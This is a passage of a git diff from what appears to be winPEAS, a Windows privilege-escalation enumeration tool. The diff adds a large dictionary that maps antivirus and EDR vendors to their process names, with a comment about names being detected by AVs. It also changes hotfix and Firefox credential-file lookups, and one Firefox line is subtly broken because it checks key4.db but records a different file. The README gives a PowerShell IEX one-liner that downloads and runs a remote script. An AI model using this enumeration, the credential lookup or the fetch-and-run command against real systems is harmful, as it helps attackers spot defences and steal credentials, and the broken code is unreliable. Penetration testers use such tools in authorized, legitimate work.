- {"norton_internet_secu_3.0_407.exe" , ""},
- {"notstart.exe" , ""},
- {"npf40_tw_98_nt_me_2k.exe" , ""},
- {"npfmessenger.exe" , ""},
- {"nprotect.exe" , ""},
- {"npscheck.exe" , ""},
- {"npssvc.exe" , ""},
- {"nsched32.exe" , ""},
- {"nssys32.exe" , ""},
- {"nstask32.exe" , ""},
- {"nsupdate.exe" , ""},
- {"nt.exe" , ""},
- {"ntrtscan.exe" , ""},
- {"ntvdm.exe" , ""},
- {"ntxconfig.exe" , ""},
- {"nui.exe" , ""},
- {"nupgrade.exe" , ""},
- {"nvarch16.exe" , ""},
- {"nvc95.exe" , ""},
- {"nvsvc32.exe" , ""},
- {"nwinst4.exe" , ""},
- {"nwservice.exe" , ""},
- {"nwtool16.exe" , ""},
- {"nxlog.exe" , ""},
- {"ollydbg.exe" , ""},
- {"onsrvr.exe" , ""},
- {"optimize.exe" , ""},
- {"ostronet.exe" , ""},
- {"osqueryd.exe" , ""},
- {"otfix.exe" , ""},
- {"outpost.exe" , ""},
- {"outpostinstall.exe" , ""},
- {"outpostproinstall.exe" , ""},
- {"padmin.exe" , ""},
- {"panixk.exe" , ""},
- {"patch.exe" , ""},
- {"pavcl.exe" , ""},
- {"pavproxy.exe" , ""},
- {"pavsched.exe" , ""},
- {"pavw.exe" , ""},
- {"pccwin98.exe" , ""},
- {"pcfwallicon.exe" , ""},
- {"pcip10117_0.exe" , ""},
- {"pcscan.exe" , ""},
- {"pdsetup.exe" , ""},
- {"periscope.exe" , ""},
- {"persfw.exe" , ""},
- {"perswf.exe" , ""},
- {"pf2.exe" , ""},
- {"pfwadmin.exe" , ""},
- {"pgmonitr.exe" , ""},
- {"pingscan.exe" , ""},
- {"platin.exe" , ""},
- {"pop3trap.exe" , ""},
- {"poproxy.exe" , ""},
- {"popscan.exe" , ""},
- {"portdetective.exe" , ""},
- {"portmonitor.exe" , ""},
- {"powerscan.exe" , ""},
- {"ppinupdt.exe" , ""},
- {"pptbc.exe" , ""},
- {"ppvstop.exe" , ""},
- {"prizesurfer.exe" , ""},
- {"prmt.exe" , ""},
- {"prmvr.exe" , ""},
- {"procdump.exe" , ""},
- {"processmonitor.exe" , ""},
- {"procexp.exe" , ""},
- {"procexp64.exe" , ""},
- {"procexplorerv1.0.exe" , ""},
- {"procmon.exe" , ""},
- {"programauditor.exe" , ""},
- {"proport.exe" , ""},
- {"protectx.exe" , ""},
- {"pspf.exe" , ""},
- {"purge.exe" , ""},
- {"qconsole.exe" , ""},
- {"qserver.exe" , ""},
- {"rapapp.exe" , ""},
- {"rav7.exe" , ""},
- {"rav7win.exe" , ""},
- {"rav8win32eng.exe" , ""},
- {"ray.exe" , ""},
- {"rb32.exe" , ""},
- {"rcsync.exe" , ""},
- {"realmon.exe" , ""},
- {"reged.exe" , ""},
- {"regedit.exe" , ""},
- {"regedt32.exe" , ""},
- {"rescue.exe" , ""},
- {"rescue32.exe" , ""},
- {"rrguard.exe" , ""},
- {"rtvscan.exe" , ""},
- {"rtvscn95.exe" , ""},
- {"rulaunch.exe" , ""},
- {"run32dll.exe" , ""},
- {"rundll.exe" , ""},
- {"rundll16.exe" , ""},
- {"ruxdll32.exe" , ""},
- {"safeweb.exe" , ""},
- {"sahagent.exescan32.exe" , ""},
- {"save.exe" , ""},
- {"savenow.exe" , ""},
- {"sbserv.exe" , ""},
- {"scam32.exe" , ""},
- {"scan32.exe" , ""},
- {"scan95.exe" , ""},
- {"scanpm.exe" , ""},
- {"scrscan.exe" , ""},
- {"SentinelOne.exe" , ""},
- {"serv95.exe" , ""},
- {"setupvameeval.exe" , ""},
- {"setup_flowprotector_us.exe", ""},
- {"sfc.exe" , ""},
- {"sgssfw32.exe" , ""},
- {"sh.exe" , ""},
- {"shellspyinstall.exe" , ""},
- {"shn.exe" , ""},
- {"showbehind.exe" , ""},
- {"shstat.exe" , "McAfee VirusScan Enterprise"},
- {"SISIDSService.exe" , ""},
- {"SISIPSUtil.exe" , ""},
- {"smc.exe" , ""},
- {"sms.exe" , ""},
- {"smss32.exe" , ""},
- {"soap.exe" , ""},
- {"sofi.exe" , ""},
- {"sperm.exe" , ""},
- {"splunk.exe" , "Splunk"},
- {"splunkd.exe" , "Splunk"},
- {"splunk-admon.exe" , "Splunk"},
- {"splunk-powershell.exe" , "Splunk"},
- {"splunk-winevtlog.exe" , "Splunk"},
- {"spf.exe" , ""},
- {"sphinx.exe" , ""},
- {"spoler.exe" , ""},
- {"spoolcv.exe" , ""},
- {"spoolsv32.exe" , ""},
- {"spyxx.exe" , ""},
- {"srexe.exe" , ""},
- {"srng.exe" , ""},
- {"ss3edit.exe" , ""},
- {"ssgrate.exe" , ""},
- {"ssg_4104.exe" , ""},
- {"st2.exe" , ""},
- {"start.exe" , ""},
- {"stcloader.exe" , ""},
- {"supftrl.exe" , ""},
- {"support.exe" , ""},
- {"supporter5.exe" , ""},
- {"svchostc.exe" , ""},
- {"svchosts.exe" , ""},
- {"sweep95.exe" , ""},
- {"sweepnet.sweepsrv.sys.swnetsup.exe", ""},
- {"symproxysvc.exe" , ""},
- {"symtray.exe" , ""},
- {"sysedit.exe" , ""},
- {"sysmon.exe" , "Sysinternals Sysmon"},
- {"sysupd.exe" , ""},
- {"TaniumClient.exe" , "Tanium"},
- {"taskmg.exe" , ""},
- {"taskmo.exe" , ""},
- {"taumon.exe" , ""},
- {"tbmon.exe" , ""},
- {"tbscan.exe" , ""},
- {"tc.exe" , ""},
- {"tca.exe" , ""},
- {"tcm.exe" , ""},
- {"tcpview.exe" , ""},
- {"tds-3.exe" , ""},
- {"tds2-98.exe" , ""},
- {"tds2-nt.exe" , ""},
- {"teekids.exe" , ""},
- {"tfak.exe" , ""},
- {"tfak5.exe" , ""},
- {"tgbob.exe" , ""},
- {"titanin.exe" , ""},
- {"titaninxp.exe" , ""},
- {"tlaservice.exe" , ""},
- {"tlaworker.exe" , ""},
- {"tracert.exe" , ""},
- {"trickler.exe" , ""},
- {"trjscan.exe" , ""},
- {"trjsetup.exe" , ""},
- {"trojantrap3.exe" , ""},
- {"tsadbot.exe" , ""},
- {"tshark.exe" , ""},
- {"tvmd.exe" , ""},
- {"tvtmd.exe" , ""},
- {"udaterui.exe" , ""},
- {"undoboot.exe" , ""},
- {"updat.exe" , ""},
- {"update.exe" , ""},
- {"updaterui.exe" , ""},
- {"upgrad.exe" , ""},
- {"utpost.exe" , ""},
- {"vbcmserv.exe" , ""},
- {"vbcons.exe" , ""},
- {"vbust.exe" , ""},
- {"vbwin9x.exe" , ""},
- {"vbwinntw.exe" , ""},
- {"vcsetup.exe" , ""},
- {"vet32.exe" , ""},
- {"vet95.exe" , ""},
- {"vettray.exe" , ""},
- {"vfsetup.exe" , ""},
- {"vir-help.exe" , ""},
- {"virusmdpersonalfirewall.exe", ""},
- {"vnlan300.exe" , ""},
- {"vnpc3000.exe" , ""},
- {"vpc32.exe" , ""},
- {"vpc42.exe" , ""},
- {"vpfw30s.exe" , ""},
- {"vptray.exe" , ""},
- {"vscan40.exe" , ""},
- {"vscenu6.02d30.exe" , ""},
- {"vsched.exe" , ""},
- {"vsecomr.exe" , ""},
- {"vshwin32.exe" , ""},
- {"vsisetup.exe" , ""},
- {"vsmain.exe" , ""},
- {"vsmon.exe" , ""},
- {"vsstat.exe" , ""},
- {"vstskmgr.exe" , "McAfee VirusScan Enterprise"},
- {"vswin9xe.exe" , ""},
- {"vswinntse.exe" , ""},
- {"vswinperse.exe" , ""},
- {"w32dsm89.exe" , ""},
- {"w9x.exe" , ""},
- {"watchdog.exe" , ""},
- {"webdav.exe" , ""},
- {"webscanx.exe" , ""},
- {"webtrap.exe" , ""},
- {"wfindv32.exe" , ""},
- {"whoswatchingme.exe" , ""},
- {"wimmun32.exe" , ""},
- {"win-bugsfix.exe" , ""},
- {"win32.exe" , ""},
- {"win32us.exe" , ""},
- {"winactive.exe" , ""},
- {"window.exe" , ""},
- {"windows.exe" , ""},
- {"wininetd.exe" , ""},
- {"wininitx.exe" , ""},
- {"winlogin.exe" , ""},
- {"winmain.exe" , ""},
- {"winnet.exe" , ""},
- {"winppr32.exe" , ""},
- {"winrecon.exe" , ""},
- {"winservn.exe" , ""},
- {"winssk32.exe" , ""},
- {"winstart.exe" , ""},
- {"winstart001.exe" , ""},
- {"wintsk32.exe" , ""},
- {"winupdate.exe" , ""},
- {"wireshark.exe" , ""},
- {"wkufind.exe" , ""},
- {"wnad.exe" , ""},
- {"wnt.exe" , ""},
- {"wradmin.exe" , ""},
- {"wrctrl.exe" , ""},
- {"wsbgate.exe" , ""},
- {"wupdater.exe" , ""},
- {"wupdt.exe" , ""},
- {"wyvernworksfirewall.exe" , ""},
- {"xagt.exe" , ""},
- {"xpf202en.exe" , ""},
- {"zapro.exe" , ""},
- {"zapsetup3001.exe" , ""},
- {"zatutor.exe" , ""},
- /*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs
- {"zonealarm" , ""},
- {"_avp32" , ""},
- {"_avpcc" , ""},
- {"rshell" , ""},
- {"_avpms" , ""}*/
+ { "ALYac", new HashSet() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } },
+ { "AVG Antivirus", new HashSet() { "avgui.exe", } },
+ { "AVG", new HashSet() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } },
+ { "Ad-Aware Total Security by Lavasoft", new HashSet() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } },
+ { "AhnLab-V3", new HashSet() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } },
+ { "Antiy-AVL", new HashSet() { "avl.exe", } },
+ { "Arcabit", new HashSet() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } },
+ { "Avast Antivirus", new HashSet() { "avastui.exe", } },
+ { "Avast", new HashSet() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } },
+ { "Avira", new HashSet() { "avira.webapphost.exe", } },
+ { "Baidu", new HashSet() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } },
+ { "BitDefender", new HashSet() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } },
+ { "Bkav Pro", new HashSet() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } },
+ { "CMC", new HashSet() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } },
+ { "Cisco", new HashSet() { "sfc.exe", } },
+ { "ClamAV", new HashSet() { "clamscan.exe", "freshclam.exe", } },
+ { "Comodo", new HashSet() { "cavwp.exe", "cfp.exe", } },
+ { "CrowdStrike Falcon", new HashSet() { "falconsensorwinos.exe", } },
+ { "Cybereason", new HashSet() { "cybereasonransomfreeservicehost.exe", } },
+ { "Cylance", new HashSet() { "cylancesvc.exe", } },
+ { "Cynet", new HashSet() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } },
+ { "Cyradar", new HashSet() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } },
+ { "DrWeb", new HashSet() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } },
+ { "ESET-NOD32", new HashSet() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } },
+ { "F-Secure", new HashSet() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } },
+ { "G Data AntiVirus", new HashSet() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } },
+ { "GridinSoft Anti-Malware", new HashSet() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } },
+ { "IObit Malware Fighter 3", new HashSet() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } },
+ { "IObit Malware Fighter 6", new HashSet() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } },
+ { "IObit Security 360", new HashSet() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } },
+ { "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } },
+ { "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } },
+ { "Kaspersky Anti-Ransomware Tool for Business", new HashSet() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } },
+ { "Kaspersky Anti-Virus 2011", new HashSet() { "kldw.exe", } },
+ { "Kaspersky Anti-Virus 2013", new HashSet() { "ffcert.exe", } },
+ { "Kaspersky Anti-Virus Personal", new HashSet() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } },
+ { "Kaspersky Antivirus", new HashSet() { "avp.exe", } },
+ { "Kaspersky", new HashSet() { "klnagent.exe", } },
+ { "Malwarebytes", new HashSet() { "mbam.exe", "mbar.exe", "mbae.exe", } },
+ { "McAfee All Access – AntiVirus Plus", new HashSet() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } },
+ { "McAfee AntiSpyware", new HashSet() { "msssrv.exe", "mcspy.exe", "msscli.exe", } },
+ { "McAfee AntiVirus Plus", new HashSet() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } },
+ { "McAfee Antivirus", new HashSet() { "mcafee.exe", } },
+ { "NANO Antivirus beta by Nano Security Ltd", new HashSet() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } },
+ { "NANO-Antivirus", new HashSet() { "nanoav.exe", } },
+ { "Norton Antivirus", new HashSet() { "nortonsecurity.exe", } },
+ { "PCMatic", new HashSet() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } },
+ { "Panda Security", new HashSet() { "psanhost.exe", } },
+ { "Panda", new HashSet() { "avengine.exe", } },
+ { "Quick Heal AntiVirus Pro", new HashSet() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } },
+ { "Quick Heal Total Security", new HashSet() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } },
+ { "Sophos Anti-Rootkit 1.5.0", new HashSet() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } },
+ { "Sophos Anti-Virus", new HashSet() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } },
+ { "Symantec Endpoint Protection", new HashSet() { "ccsvchst.exe", } },
+ { "Symantec", new HashSet() { "sepwscsvc64.exe", } },
+ { "Total Defense Anti-Virus", new HashSet() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } },
+ { "Trend micro", new HashSet() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } },
+ { "VIPRE Advanced Security by ThreatTrack Security", new HashSet() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } },
+ { "VIPRE Antivirus by GFI Software", new HashSet() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } },
+ { "ViRobot Anti-Ransomware by HAURI", new HashSet() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } },
+ { "ViRobot Internet Security 2011 by HAURI", new HashSet() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } },
+ { "Webroot", new HashSet() { "wrsa.exe", } },
+ { "Windows defender", new HashSet() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } },
+ { "Zillya Internet Security by ALLIT Service", new HashSet() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } },
+ { "Zillya! Antivirus by ALLIT Service", new HashSet() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
+ { "Zillya! Internet Security by ALLIT Service", new HashSet() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
+ { "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
+ { "ZoneAlarm Antivirus by Check Point, Inc", new HashSet() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
+ { "ZoneAlarm by Check Point, Inc", new HashSet() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
};
+ // reverse lookup list
+ public static Dictionary> AVVendorsByProcess = new Dictionary>();
+
+ static DefensiveProcesses()
+ {
+ // initialize the structure here
+ foreach (var kvp in Definitions)
+ {
+ var vendor = kvp.Key;
+
+ foreach (var executable in kvp.Value)
+ {
+ var sanitizedExecutable = executable.Trim().ToLower();
+
+ if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
+ {
+ AVVendorsByProcess.Add(sanitizedExecutable, new HashSet() { vendor });
+ }
+ else
+ {
+ AVVendorsByProcess[sanitizedExecutable].Add(vendor);
+ }
+ }
+ }
+ }
}
}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
index 275b762..fcf542f 100644
--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
@@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
string dnsDomain = properties.DomainName;
- const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering";
+ const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
using (var search = new ManagementObjectSearcher(query))
{
@@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
string hotfixes = "";
foreach (ManagementObject quickFix in collection)
{
- hotfixes += quickFix["HotFixID"].ToString() + ", ";
+ hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
}
results.Add("Hostname", strHostName);
diff --git a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
index a067c87..31d6c61 100644
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
@@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}";
if (File.Exists(firefoxCredentialFile4))
{
- results.Add(firefoxCredentialFile4);
+ results.Add(firefoxCredentialFile3);
}
}
}
diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
index c819feb..19a037c 100755
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
@@ -118,6 +118,7 @@
+
@@ -1002,6 +1003,7 @@
+
@@ -1038,6 +1040,11 @@
+
+
+
+
+
@@ -1058,7 +1065,7 @@
-
+
@@ -1068,6 +1075,10 @@
+
+
+
+
diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
index 0ca5182..faa7a28 100755
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
@@ -5,7 +5,7 @@
- fileanalysis debug
+ cloudinfo -network="auto" -ports="21,22,445"
debug
diff --git a/winPEAS/winPEASps1/README.md b/winPEAS/winPEASps1/README.md
index 82f1232..ddf3fc8 100755
--- a/winPEAS/winPEASps1/README.md
+++ b/winPEAS/winPEASps1/README.md
@@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re
```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
+```
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop